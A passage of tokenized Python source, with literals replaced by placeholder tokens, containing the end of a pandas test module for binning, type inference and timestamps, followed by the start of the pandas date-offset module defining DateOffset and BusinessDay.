array ( [ <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:6> ] ) ) . all ( ) ) <EOL> for func in [ lib . generate_bins_dt64 , generate_bins_generic ] : <EOL> values = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , dtype = np . int64 ) <EOL> binner = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:6> ] , dtype = np . int64 ) <EOL> bins = func ( values , binner , closed = '<STR_LIT:right>' ) <EOL> assert ( ( bins == np . array ( [ <NUM_LIT:3> , <NUM_LIT:6> ] ) ) . all ( ) ) <EOL> self . assertRaises ( ValueError , generate_bins_generic , values , [ ] , <EOL> '<STR_LIT:right>' ) <EOL> self . assertRaises ( ValueError , generate_bins_generic , values [ : <NUM_LIT:0> ] , <EOL> binner , '<STR_LIT:right>' ) <EOL> self . assertRaises ( ValueError , generate_bins_generic , values , [ <NUM_LIT:4> ] , <EOL> '<STR_LIT:right>' ) <EOL> self . assertRaises ( ValueError , generate_bins_generic , values , [ - <NUM_LIT:3> , - <NUM_LIT:1> ] , <EOL> '<STR_LIT:right>' ) <EOL> def test_group_ohlc ( ) : <EOL> def _check ( dtype ) : <EOL> obj = np . array ( np . random . randn ( <NUM_LIT:20> ) , dtype = dtype ) <EOL> bins = np . array ( [ <NUM_LIT:6> , <NUM_LIT:12> , <NUM_LIT:20> ] ) <EOL> out = np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:4> ) , dtype ) <EOL> counts = np . zeros ( len ( out ) , dtype = np . int64 ) <EOL> labels = com . _ensure_int64 ( np . repeat ( <EOL> np . arange ( <NUM_LIT:3> ) , np . diff ( np . r_ [ <NUM_LIT:0> , bins ] ) ) ) <EOL> func = getattr ( algos , '<STR_LIT>' % dtype ) <EOL> func ( out , counts , obj [ : , None ] , labels ) <EOL> def _ohlc ( group ) : <EOL> if isnull ( group ) . all ( ) : <EOL> return np . repeat ( nan , <NUM_LIT:4> ) <EOL> return [ group [ <NUM_LIT:0> ] , group . max ( ) , group . min ( ) , group [ - <NUM_LIT:1> ] ] <EOL> expected = np . array ( [ _ohlc ( obj [ : <NUM_LIT:6> ] ) , _ohlc ( obj [ <NUM_LIT:6> : <NUM_LIT:12> ] ) , _ohlc ( obj [ <NUM_LIT:12> : ] ) <EOL> ] ) <EOL> assert_almost_equal ( out , expected ) <EOL> assert_almost_equal ( counts , [ <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:8> ] ) <EOL> obj [ : <NUM_LIT:6> ] = nan <EOL> func ( out , counts , obj [ : , None ] , labels ) <EOL> expected [ <NUM_LIT:0> ] = nan <EOL> assert_almost_equal ( out , expected ) <EOL> _check ( '<STR_LIT>' ) <EOL> _check ( '<STR_LIT>' ) <EOL> def test_try_parse_dates ( ) : <EOL> from dateutil . parser import parse <EOL> arr = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dtype = object ) <EOL> result = lib . try_parse_dates ( arr , dayfirst = True ) <EOL> expected = [ parse ( d , dayfirst = True ) for d in arr ] <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> class TestTypeInference ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def test_length_zero ( self ) : <EOL> result = lib . infer_dtype ( np . array ( [ ] , dtype = '<STR_LIT>' ) ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( [ ] ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_integers ( self ) : <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , np . int64 ( <NUM_LIT:4> ) , np . int32 ( <NUM_LIT:5> ) ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , np . int64 ( <NUM_LIT:4> ) , np . int32 ( <NUM_LIT:5> ) , '<STR_LIT:foo>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_bools ( self ) : <EOL> arr = np . array ( [ True , False , True , True , True ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ np . bool_ ( True ) , np . bool_ ( False ) ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ True , False , True , '<STR_LIT:foo>' ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ True , False , True ] , dtype = bool ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_floats ( self ) : <EOL> arr = np . array ( [ <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , np . float64 ( <NUM_LIT:4> ) , np . float32 ( <NUM_LIT:5> ) ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , np . float64 ( <NUM_LIT:4> ) , np . float32 ( <NUM_LIT:5> ) , '<STR_LIT:foo>' ] , <EOL> dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_string ( self ) : <EOL> pass <EOL> def test_unicode ( self ) : <EOL> pass <EOL> def test_datetime ( self ) : <EOL> dates = [ datetime . datetime ( <NUM_LIT> , <NUM_LIT:1> , x ) for x in range ( <NUM_LIT:1> , <NUM_LIT:20> ) ] <EOL> index = Index ( dates ) <EOL> self . assertEqual ( index . inferred_type , '<STR_LIT>' ) <EOL> def test_date ( self ) : <EOL> dates = [ datetime . date ( <NUM_LIT> , <NUM_LIT:1> , x ) for x in range ( <NUM_LIT:1> , <NUM_LIT:20> ) ] <EOL> index = Index ( dates ) <EOL> self . assertEqual ( index . inferred_type , '<STR_LIT:date>' ) <EOL> def test_to_object_array_tuples ( self ) : <EOL> r = ( <NUM_LIT:5> , <NUM_LIT:6> ) <EOL> values = [ r ] <EOL> result = lib . to_object_array_tuples ( values ) <EOL> try : <EOL> from collections import namedtuple <EOL> record = namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> r = record ( <NUM_LIT:5> , <NUM_LIT:6> ) <EOL> values = [ r ] <EOL> result = lib . to_object_array_tuples ( values ) <EOL> except ImportError : <EOL> pass <EOL> def test_object ( self ) : <EOL> arr = np . array ( [ None ] , dtype = '<STR_LIT:O>' ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> def test_categorical ( self ) : <EOL> from pandas import Categorical , Series <EOL> arr = Categorical ( list ( '<STR_LIT:abc>' ) ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( Series ( arr ) ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> arr = Categorical ( list ( '<STR_LIT:abc>' ) , categories = [ '<STR_LIT>' ] , ordered = True ) <EOL> result = lib . infer_dtype ( arr ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> result = lib . infer_dtype ( Series ( arr ) ) <EOL> self . assertEqual ( result , '<STR_LIT>' ) <EOL> class TestMoments ( tm . TestCase ) : <EOL> pass <EOL> class TestReducer ( tm . TestCase ) : <EOL> def test_int_index ( self ) : <EOL> from pandas . core . series import Series <EOL> arr = np . random . randn ( <NUM_LIT:100> , <NUM_LIT:4> ) <EOL> result = lib . reduce ( arr , np . sum , labels = Index ( np . arange ( <NUM_LIT:4> ) ) ) <EOL> expected = arr . sum ( <NUM_LIT:0> ) <EOL> assert_almost_equal ( result , expected ) <EOL> result = lib . reduce ( arr , np . sum , axis = <NUM_LIT:1> , labels = Index ( np . arange ( <NUM_LIT:100> ) ) ) <EOL> expected = arr . sum ( <NUM_LIT:1> ) <EOL> assert_almost_equal ( result , expected ) <EOL> dummy = Series ( <NUM_LIT:0.> , index = np . arange ( <NUM_LIT:100> ) ) <EOL> result = lib . reduce ( arr , np . sum , dummy = dummy , <EOL> labels = Index ( np . arange ( <NUM_LIT:4> ) ) ) <EOL> expected = arr . sum ( <NUM_LIT:0> ) <EOL> assert_almost_equal ( result , expected ) <EOL> dummy = Series ( <NUM_LIT:0.> , index = np . arange ( <NUM_LIT:4> ) ) <EOL> result = lib . reduce ( arr , np . sum , axis = <NUM_LIT:1> , dummy = dummy , <EOL> labels = Index ( np . arange ( <NUM_LIT:100> ) ) ) <EOL> expected = arr . sum ( <NUM_LIT:1> ) <EOL> assert_almost_equal ( result , expected ) <EOL> result = lib . reduce ( arr , np . sum , axis = <NUM_LIT:1> , dummy = dummy , <EOL> labels = Index ( np . arange ( <NUM_LIT:100> ) ) ) <EOL> assert_almost_equal ( result , expected ) <EOL> class TestTsUtil ( tm . TestCase ) : <EOL> def test_min_valid ( self ) : <EOL> Timestamp ( Timestamp . min ) <EOL> def test_max_valid ( self ) : <EOL> Timestamp ( Timestamp . max ) <EOL> def test_to_datetime_bijective ( self ) : <EOL> self . assertEqual ( <EOL> Timestamp ( Timestamp . max . to_pydatetime ( ) ) . value / <NUM_LIT:1000> , <EOL> Timestamp . max . value / <NUM_LIT:1000> ) <EOL> self . assertEqual ( <EOL> Timestamp ( Timestamp . min . to_pydatetime ( ) ) . value / <NUM_LIT:1000> , <EOL> Timestamp . min . value / <NUM_LIT:1000> ) <EOL> class TestPeriodField ( tm . TestCase ) : <EOL> def test_get_period_field_raises_on_out_of_range ( self ) : <EOL> self . assertRaises ( ValueError , period . get_period_field , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def test_get_period_field_array_raises_on_out_of_range ( self ) : <EOL> self . assertRaises ( ValueError , period . get_period_field_arr , - <NUM_LIT:1> , <EOL> np . empty ( <NUM_LIT:1> ) , <NUM_LIT:0> ) </s>
<s> from datetime import date , datetime , timedelta <EOL> from pandas . compat import range <EOL> from pandas import compat <EOL> import numpy as np <EOL> from pandas . tseries . tools import to_datetime , normalize_date <EOL> from pandas . core . common import ABCSeries , ABCDatetimeIndex <EOL> from dateutil . relativedelta import relativedelta , weekday <EOL> from dateutil . easter import easter <EOL> import pandas . tslib as tslib <EOL> from pandas . tslib import Timestamp , OutOfBoundsDatetime , Timedelta <EOL> import functools <EOL> import operator <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def as_timestamp ( obj ) : <EOL> if isinstance ( obj , Timestamp ) : <EOL> return obj <EOL> try : <EOL> return Timestamp ( obj ) <EOL> except ( OutOfBoundsDatetime ) : <EOL> pass <EOL> return obj <EOL> def as_datetime ( obj ) : <EOL> f = getattr ( obj , '<STR_LIT>' , None ) <EOL> if f is not None : <EOL> obj = f ( ) <EOL> return obj <EOL> def apply_wraps ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( self , other ) : <EOL> if other is tslib . NaT : <EOL> return tslib . NaT <EOL> elif isinstance ( other , ( timedelta , Tick , DateOffset ) ) : <EOL> return func ( self , other ) <EOL> elif isinstance ( other , ( np . datetime64 , datetime , date ) ) : <EOL> other = as_timestamp ( other ) <EOL> tz = getattr ( other , '<STR_LIT>' , None ) <EOL> nano = getattr ( other , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> try : <EOL> if self . _adjust_dst and isinstance ( other , Timestamp ) : <EOL> other = other . tz_localize ( None ) <EOL> result = func ( self , other ) <EOL> if self . _adjust_dst : <EOL> result = tslib . _localize_pydatetime ( result , tz ) <EOL> result = Timestamp ( result ) <EOL> if self . normalize : <EOL> result = result . normalize ( ) <EOL> if not self . normalize and nano != <NUM_LIT:0> : <EOL> if not isinstance ( self , Nano ) and result . nanosecond != nano : <EOL> if result . tz is not None : <EOL> value = tslib . tz_convert_single ( <EOL> result . value , '<STR_LIT>' , result . tz ) <EOL> else : <EOL> value = result . value <EOL> result = Timestamp ( value + nano ) <EOL> if tz is not None and result . tzinfo is None : <EOL> result = tslib . _localize_pydatetime ( result , tz ) <EOL> except OutOfBoundsDatetime : <EOL> result = func ( self , as_datetime ( other ) ) <EOL> if self . normalize : <EOL> result = normalize_date ( result ) <EOL> if tz is not None and result . tzinfo is None : <EOL> result = tslib . _localize_pydatetime ( result , tz ) <EOL> return result <EOL> return wrapper <EOL> def apply_index_wraps ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( self , other ) : <EOL> result = func ( self , other ) <EOL> if self . normalize : <EOL> result = result . to_period ( '<STR_LIT:D>' ) . to_timestamp ( ) <EOL> return result <EOL> return wrapper <EOL> def _is_normalized ( dt ) : <EOL> if ( dt . hour != <NUM_LIT:0> or dt . minute != <NUM_LIT:0> or dt . second != <NUM_LIT:0> or <EOL> dt . microsecond != <NUM_LIT:0> or getattr ( dt , '<STR_LIT>' , <NUM_LIT:0> ) != <NUM_LIT:0> ) : <EOL> return False <EOL> return True <EOL> class ApplyTypeError ( TypeError ) : <EOL> pass <EOL> class CacheableOffset ( object ) : <EOL> _cacheable = True <EOL> class DateOffset ( object ) : <EOL> """<STR_LIT>""" <EOL> _cacheable = False <EOL> _normalize_cache = True <EOL> _kwds_use_relativedelta = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> _use_relativedelta = False <EOL> _adjust_dst = False <EOL> normalize = False <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . _offset , self . _use_relativedelta = self . _determine_offset ( ) <EOL> def _determine_offset ( self ) : <EOL> kwds_no_nanos = dict ( <EOL> ( k , v ) for k , v in self . kwds . items ( ) <EOL> if k not in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> use_relativedelta = False <EOL> if len ( kwds_no_nanos ) > <NUM_LIT:0> : <EOL> if any ( k in self . _kwds_use_relativedelta for k in kwds_no_nanos ) : <EOL> use_relativedelta = True <EOL> offset = relativedelta ( ** kwds_no_nanos ) <EOL> else : <EOL> offset = timedelta ( ** kwds_no_nanos ) <EOL> else : <EOL> offset = timedelta ( <NUM_LIT:1> ) <EOL> return offset , use_relativedelta <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> if self . _use_relativedelta : <EOL> other = as_datetime ( other ) <EOL> if len ( self . kwds ) > <NUM_LIT:0> : <EOL> tzinfo = getattr ( other , '<STR_LIT>' , None ) <EOL> if tzinfo is not None and self . _use_relativedelta : <EOL> other = other . replace ( tzinfo = None ) <EOL> if self . n > <NUM_LIT:0> : <EOL> for i in range ( self . n ) : <EOL> other = other + self . _offset <EOL> else : <EOL> for i in range ( - self . n ) : <EOL> other = other - self . _offset <EOL> if tzinfo is not None and self . _use_relativedelta : <EOL> other = tslib . _localize_pydatetime ( other , tzinfo ) <EOL> return as_timestamp ( other ) <EOL> else : <EOL> return other + timedelta ( self . n ) <EOL> @ apply_index_wraps <EOL> def apply_index ( self , i ) : <EOL> """<STR_LIT>""" <EOL> if not type ( self ) is DateOffset : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( self . __class__ . __name__ , ) ) <EOL> relativedelta_fast = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if ( self . _use_relativedelta and <EOL> set ( self . kwds ) . issubset ( relativedelta_fast ) ) : <EOL> months = ( ( self . kwds . get ( '<STR_LIT>' , <NUM_LIT:0> ) * <NUM_LIT:12> + <EOL> self . kwds . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) * self . n ) <EOL> if months : <EOL> shifted = tslib . shift_months ( i . asi8 , months ) <EOL> i = i . _shallow_copy ( shifted ) <EOL> weeks = ( self . kwds . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) * self . n <EOL> if weeks : <EOL> i = ( i . to_period ( '<STR_LIT>' ) + weeks ) . to_timestamp ( ) + i . to_perioddelta ( '<STR_LIT>' ) <EOL> timedelta_kwds = dict ( ( k , v ) for k , v in self . kwds . items ( ) <EOL> if k in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if timedelta_kwds : <EOL> delta = Timedelta ( ** timedelta_kwds ) <EOL> i = i + ( self . n * delta ) <EOL> return i <EOL> elif not self . _use_relativedelta and hasattr ( self , '<STR_LIT>' ) : <EOL> return i + ( self . _offset * self . n ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( set ( self . kwds ) - relativedelta_fast ) , ) <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> ) <EOL> def copy ( self ) : <EOL> return self . __class__ ( self . n , normalize = self . normalize , ** self . kwds ) <EOL> def _should_cache ( self ) : <EOL> return self . isAnchored ( ) and self . _cacheable <EOL> def _params ( self ) : <EOL> all_paras = dict ( list ( vars ( self ) . items ( ) ) + list ( self . kwds . items ( ) ) ) <EOL> if '<STR_LIT>' in all_paras and not all_paras [ '<STR_LIT>' ] : <EOL> all_paras . pop ( '<STR_LIT>' ) <EOL> exclude = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> attrs = [ ( k , v ) for k , v in all_paras . items ( ) <EOL> if ( k not in exclude ) and ( k [ <NUM_LIT:0> ] != '<STR_LIT:_>' ) ] <EOL> attrs = sorted ( set ( attrs ) ) <EOL> params = tuple ( [ str ( self . __class__ ) ] + attrs ) <EOL> return params <EOL> def __repr__ ( self ) : <EOL> className = getattr ( self , '<STR_LIT>' , type ( self ) . __name__ ) <EOL> exclude = set ( [ '<STR_LIT:n>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> attrs = [ ] <EOL> for attr in sorted ( self . __dict__ ) : <EOL> if ( ( attr == '<STR_LIT>' and len ( self . kwds ) == <NUM_LIT:0> ) or <EOL> attr . startswith ( '<STR_LIT:_>' ) ) : <EOL> continue <EOL> elif attr == '<STR_LIT>' : <EOL> kwds_new = { } <EOL> for key in self . kwds : <EOL> if not hasattr ( self , key ) : <EOL> kwds_new [ key ] = self . kwds [ key ] <EOL> if len ( kwds_new ) > <NUM_LIT:0> : <EOL> attrs . append ( '<STR_LIT:=>' . join ( ( attr , repr ( kwds_new ) ) ) ) <EOL> else : <EOL> if attr not in exclude : <EOL> attrs . append ( '<STR_LIT:=>' . join ( ( attr , repr ( getattr ( self , attr ) ) ) ) ) <EOL> if abs ( self . n ) != <NUM_LIT:1> : <EOL> plural = '<STR_LIT:s>' <EOL> else : <EOL> plural = '<STR_LIT>' <EOL> n_str = "<STR_LIT>" <EOL> if self . n != <NUM_LIT:1> : <EOL> n_str = "<STR_LIT>" % self . n <EOL> out = '<STR_LIT>' % n_str + className + plural <EOL> if attrs : <EOL> out += '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( attrs ) <EOL> out += '<STR_LIT:>>' <EOL> return out <EOL> @ property <EOL> def name ( self ) : <EOL> return self . rule_code <EOL> def __eq__ ( self , other ) : <EOL> if other is None : <EOL> return False <EOL> if isinstance ( other , compat . string_types ) : <EOL> from pandas . tseries . frequencies import to_offset <EOL> other = to_offset ( other ) <EOL> if not isinstance ( other , DateOffset ) : <EOL> return False <EOL> return self . _params ( ) == other . _params ( ) <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _params ( ) ) <EOL> def __call__ ( self , other ) : <EOL> return self . apply ( other ) <EOL> def __add__ ( self , other ) : <EOL> if isinstance ( other , ( ABCDatetimeIndex , ABCSeries ) ) : <EOL> return other + self <EOL> try : <EOL> return self . apply ( other ) <EOL> except ApplyTypeError : <EOL> return NotImplemented <EOL> def __radd__ ( self , other ) : <EOL> return self . __add__ ( other ) <EOL> def __sub__ ( self , other ) : <EOL> if isinstance ( other , datetime ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> elif type ( other ) == type ( self ) : <EOL> return self . __class__ ( self . n - other . n , normalize = self . normalize , <EOL> ** self . kwds ) <EOL> else : <EOL> return NotImplemented <EOL> def __rsub__ ( self , other ) : <EOL> if isinstance ( other , ( ABCDatetimeIndex , ABCSeries ) ) : <EOL> return other - self <EOL> return self . __class__ ( - self . n , normalize = self . normalize , <EOL> ** self . kwds ) + other <EOL> def __mul__ ( self , someInt ) : <EOL> return self . __class__ ( n = someInt * self . n , normalize = self . normalize , <EOL> ** self . kwds ) <EOL> def __rmul__ ( self , someInt ) : <EOL> return self . __mul__ ( someInt ) <EOL> def __neg__ ( self ) : <EOL> return self . __class__ ( - self . n , normalize = self . normalize , ** self . kwds ) <EOL> def rollback ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> dt = as_timestamp ( dt ) <EOL> if not self . onOffset ( dt ) : <EOL> dt = dt - self . __class__ ( <NUM_LIT:1> , normalize = self . normalize , ** self . kwds ) <EOL> return dt <EOL> def rollforward ( self , dt ) : <EOL> """<STR_LIT>""" <EOL> dt = as_timestamp ( dt ) <EOL> if not self . onOffset ( dt ) : <EOL> dt = dt + self . __class__ ( <NUM_LIT:1> , normalize = self . normalize , ** self . kwds ) <EOL> return dt <EOL> def onOffset ( self , dt ) : <EOL> if self . normalize and not _is_normalized ( dt ) : <EOL> return False <EOL> if type ( self ) == DateOffset or isinstance ( self , Tick ) : <EOL> return True <EOL> a = dt <EOL> b = ( ( dt + self ) - self ) <EOL> return a == b <EOL> def _beg_apply_index ( self , i , freq ) : <EOL> """<STR_LIT>""" <EOL> off = i . to_perioddelta ( '<STR_LIT:D>' ) <EOL> from pandas . tseries . frequencies import get_freq_code <EOL> base , mult = get_freq_code ( freq ) <EOL> base_period = i . to_period ( base ) <EOL> if self . n <= <NUM_LIT:0> : <EOL> roll = np . where ( base_period . to_timestamp ( ) == i - off , <EOL> self . n , self . n + <NUM_LIT:1> ) <EOL> else : <EOL> roll = self . n <EOL> base = ( base_period + roll ) . to_timestamp ( ) <EOL> return base + off <EOL> def _end_apply_index ( self , i , freq ) : <EOL> """<STR_LIT>""" <EOL> off = i . to_perioddelta ( '<STR_LIT:D>' ) <EOL> from pandas . tseries . frequencies import get_freq_code <EOL> base , mult = get_freq_code ( freq ) <EOL> base_period = i . to_period ( base ) <EOL> if self . n > <NUM_LIT:0> : <EOL> roll = np . where ( base_period . to_timestamp ( how = '<STR_LIT:end>' ) == i - off , <EOL> self . n , self . n - <NUM_LIT:1> ) <EOL> else : <EOL> roll = self . n <EOL> base = ( base_period + roll ) . to_timestamp ( how = '<STR_LIT:end>' ) <EOL> return base + off <EOL> @ property <EOL> def _prefix ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> @ property <EOL> def rule_code ( self ) : <EOL> return self . _prefix <EOL> @ property <EOL> def freqstr ( self ) : <EOL> try : <EOL> code = self . rule_code <EOL> except NotImplementedError : <EOL> return repr ( self ) <EOL> if self . n != <NUM_LIT:1> : <EOL> fstr = '<STR_LIT>' % ( self . n , code ) <EOL> else : <EOL> fstr = code <EOL> return fstr <EOL> @ property <EOL> def nanos ( self ) : <EOL> raise ValueError ( "<STR_LIT>" . format ( self ) ) <EOL> class SingleConstructorOffset ( DateOffset ) : <EOL> @ classmethod <EOL> def _from_name ( cls , suffix = None ) : <EOL> if suffix : <EOL> raise ValueError ( "<STR_LIT>" % suffix ) <EOL> return cls ( ) <EOL> class BusinessMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> className = getattr ( self , '<STR_LIT>' , self . __class__ . __name__ ) <EOL> if abs ( self . n ) != <NUM_LIT:1> : <EOL> plural = '<STR_LIT:s>' <EOL> else : <EOL> plural = '<STR_LIT>' <EOL> n_str = "<STR_LIT>" <EOL> if self . n != <NUM_LIT:1> : <EOL> n_str = "<STR_LIT>" % self . n <EOL> out = '<STR_LIT>' % n_str + className + plural + self . _repr_attrs ( ) + '<STR_LIT:>>' <EOL> return out <EOL> def _repr_attrs ( self ) : <EOL> if self . offset : <EOL> attrs = [ '<STR_LIT>' % repr ( self . offset ) ] <EOL> else : <EOL> attrs = None <EOL> out = '<STR_LIT>' <EOL> if attrs : <EOL> out += '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( attrs ) <EOL> return out <EOL> class BusinessDay ( BusinessMixin , SingleConstructorOffset ) : <EOL> """<STR_LIT>""" <EOL> _prefix = '<STR_LIT:B>' <EOL> _adjust_dst = True <EOL> def __init__ ( self , n = <NUM_LIT:1> , normalize = False , ** kwds ) : <EOL> self . n = int ( n ) <EOL> self . normalize = normalize <EOL> self . kwds = kwds <EOL> self . offset = kwds . get ( '<STR_LIT>' , timedelta ( <NUM_LIT:0> ) ) <EOL> @ property <EOL> def freqstr ( self ) : <EOL> try : <EOL> code = self . rule_code <EOL> except NotImplementedError : <EOL> return repr ( self ) <EOL> if self . n != <NUM_LIT:1> : <EOL> fstr = '<STR_LIT>' % ( self . n , code ) <EOL> else : <EOL> fstr = code <EOL> if self . offset : <EOL> fstr += self . _offset_str ( ) <EOL> return fstr <EOL> def _offset_str ( self ) : <EOL> def get_str ( td ) : <EOL> off_str = '<STR_LIT>' <EOL> if td . days > <NUM_LIT:0> : <EOL> off_str += str ( td . days ) + '<STR_LIT:D>' <EOL> if td . seconds > <NUM_LIT:0> : <EOL> s = td . seconds <EOL> hrs = int ( s / <NUM_LIT> ) <EOL> if hrs != <NUM_LIT:0> : <EOL> off_str += str ( hrs ) + '<STR_LIT:H>' <EOL> s -= hrs * <NUM_LIT> <EOL> mts = int ( s / <NUM_LIT> ) <EOL> if mts != <NUM_LIT:0> : <EOL> off_str += str ( mts ) + '<STR_LIT>' <EOL> s -= mts * <NUM_LIT> <EOL> if s != <NUM_LIT:0> : <EOL> off_str += str ( s ) + '<STR_LIT:s>' <EOL> if td . microseconds > <NUM_LIT:0> : <EOL> off_str += str ( td . microseconds ) + '<STR_LIT>' <EOL> return off_str <EOL> if isinstance ( self . offset , timedelta ) : <EOL> zero = timedelta ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if self . offset >= zero : <EOL> off_str = '<STR_LIT:+>' + get_str ( self . offset ) <EOL> else : <EOL> off_str = '<STR_LIT:->' + get_str ( - self . offset ) <EOL> return off_str <EOL> else : <EOL> return '<STR_LIT:+>' + repr ( self . offset ) <EOL> def isAnchored ( self ) : <EOL> return ( self . n == <NUM_LIT:1> ) <EOL> @ apply_wraps <EOL> def apply ( self , other ) : <EOL> if isinstance ( other , datetime ) : <EOL> n = self . n <EOL> if n == <NUM_LIT:0> and other . weekday ( ) > <NUM_LIT:4> : <EOL> n = <NUM_LIT:1> <EOL> result = other <EOL> if abs ( n ) > <NUM_LIT:5> : <EOL> k = n // <NUM_LIT:5> <EOL> result = result + timedelta ( <NUM_LIT:7> * k ) <EOL> if n < <NUM_LIT:0> and result . weekday ( ) > <NUM_LIT:4> : <EOL> n += <NUM_LIT:1> <EOL> n -= <NUM_LIT:5> * k <EOL> if n == <NUM_LIT:0> and result . weekday 